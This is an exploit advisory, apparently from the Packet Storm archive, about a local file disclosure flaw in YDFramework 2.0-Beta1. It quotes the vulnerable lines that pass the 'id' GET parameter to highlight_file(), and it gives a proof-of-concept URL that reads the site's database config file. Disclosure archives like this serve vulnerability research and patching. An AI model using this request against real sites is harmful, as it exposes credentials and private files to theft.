YDFramework version 2.0-Beta1 suffers from a local file disclosure vulnerability.
30af9929c9f3964f827f0a5fca1c7df7ea29edae703cfdfcf3fc2c41f7adfd54# Author : L3b-r1'z
# Site : Exploit4arab.com
# Title : YDFramework-2.0-beta1 Local File Disclosure
# Downalod : http://developer.berlios.de/project/showfiles.php?group_id=3988&release_id=6710
# Google Dork : N/A
<-- Info Of This fuckin Sploit :P :
This Exploit You Can Read Any File's In The Site
Look To The File Named Index.php On Line 26 :
$file = $_GET['id'];
And Line 46 :
highlight_file($file);
So This Function Highlight_File Like Show_source or Readfile :D
It's Danger Func -->
# P0c :
http://localhost/index.php?id=./database/config.php
# Greet'z : All My Friend's , And Exploit4arab Visitor's :P
--
Proud To Be Lebanese :D
I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The
Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The
Viper, Th3 Killer Dz, Over-X <3, And All My Friends.
Sec4ever.com.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed